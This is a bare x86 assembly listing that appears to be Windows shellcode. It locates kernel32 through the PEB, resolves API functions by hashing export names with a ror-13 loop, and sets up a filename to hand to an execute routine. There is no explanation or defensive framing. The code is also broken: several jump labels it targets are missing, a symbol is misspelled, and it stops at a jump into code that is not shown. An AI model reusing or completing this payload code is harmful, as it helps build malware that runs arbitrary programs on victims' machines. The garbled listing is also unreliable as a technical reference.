push ebp
mov ebp,esp
push ebx
push esi
push edi
jmp __startup; ; these are just functions.... skip
push esi ; Save esi
push 0x30
pop ecx
mov eax, fs:[ecx] ; Extract the PEB
mov eax, [eax + 0x0c] ; Extract the PROCESS_MODULE_INFO pointer from the PEB
mov esi, [eax + 0x1c] ; Get the address of flink in the init module list
lodsd ; Load the address of blink into eax
mov eax, [eax + 0x8] ; Grab the module base address from the list entry
pop esi ; Restore esi
ret ; Return
pushad ; Save all registers
mov ebp, [esp + 0x24] ; Store the base address in eax
mov eax, [ebp + 0x3c] ; PE header VMA
mov edx, [ebp + eax + 0x78] ; Export table relative offset
add edx, ebp ; Export table VMA
mov ecx, [edx + 0x18] ; Number of names
mov ebx, [edx + 0x20] ; Names table relative offset
add ebx, ebp ; Names table VMA
jecxz __find_function_finished ; Jump to the end if ecx is 0
dec ecx ; Decrement our names counter
mov esi, [ebx + ecx * 4] ; Store the relative offset of the name
add esi, ebp ; Set esi to the VMA of the current name
xor edi, edi ; Zero edi
xor eax, eax ; Zero eax
cld ; Clear direction
lodsb ; Load the next byte from esi into al
test al, al ; Test ourselves.
jz __compute_hash_finished ; If the ZF is set, we've hit the null term.
ror edi, 0xd ; Rotate edi 13 bits to the right
add edi, eax ; Add the new byte to the accumulator
jmp __compute_hash_again ; Next iteration
cmp edi, [esp + 0x28] ; Compare the computed hash with the requested hash
jnz __find_function_loop ; No match, try the next one.
mov ebx, [edx + 0x24] ; Ordinals table relative offset
add ebx, ebp ; Ordinals table VMA
mov cx, [ebx + 2 * ecx] ; Extrapolate the function's ordinal
mov ebx, [edx + 0x1c] ; Address table relative offset
add ebx, ebp ; Address table VMA
mov eax, [ebx + 4 * ecx] ; Extract the relative function offset from its ordinal
add eax, ebp ; Function VMA
mov [esp + 0x1c], eax ; Overwrite stack version of eax from pushad
popad ; Restore all registers
ret 8
pop edi ; Pop address
mov ebx, __execute
sub ebx, [CommendLine]
sub edi, ebx ; filename offset
mov esi,edi ; filename to edi
call __find_kernel32 ; Find kernel32 address
mov ebx, eax ; Save address in ebx
jmp short __execute ; Skip data